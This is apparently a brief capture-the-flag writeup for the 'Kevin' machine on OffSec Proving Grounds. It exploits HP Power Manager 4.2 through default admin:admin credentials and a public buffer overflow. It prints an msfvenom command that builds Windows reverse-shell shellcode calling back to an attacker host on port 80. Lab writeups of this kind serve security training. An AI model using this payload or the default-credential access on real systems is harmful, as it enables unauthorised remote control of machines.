Kevin

Writeup for Kevin from offsec Proving Grounds

Information Gathering

sudo ./nmapAutomator.sh 192.168.218.45 all

Service Enumeration

HTTP (Port 80)

HP Power Manager. We are easily authenticated using admin:admin.

We can see here that this is running HP Power Manager 4.2

* Take note: The target IP above and below may differ as I finished this box on another day. *

Exploit

There is an exploit for this.

Hewlett-Packard (HP) Power Manager Administration Power Manager Administration - Universal Buffer OverflowExploit Database

Generating shellcode: msfvenom -p windows/shell_reverse_tcp -b "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c\x3d\x3b\x2d\x2c\x2e\x24\x25\x1a" LHOST=192.168.49.70 LPORT=80 -e x86/alpha_mixed -f c

We then replace the shellcode in the script with our generated shellcode and run the exploit.

PreviousWindows NextInternal

Last updated 2 years ago

Information Gathering

Service Enumeration

HTTP (Port 80)

*** Take note: The target IP above and below may differ as I finished this box on another day. ***

Exploit

* Take note: The target IP above and below may differ as I finished this box on another day. *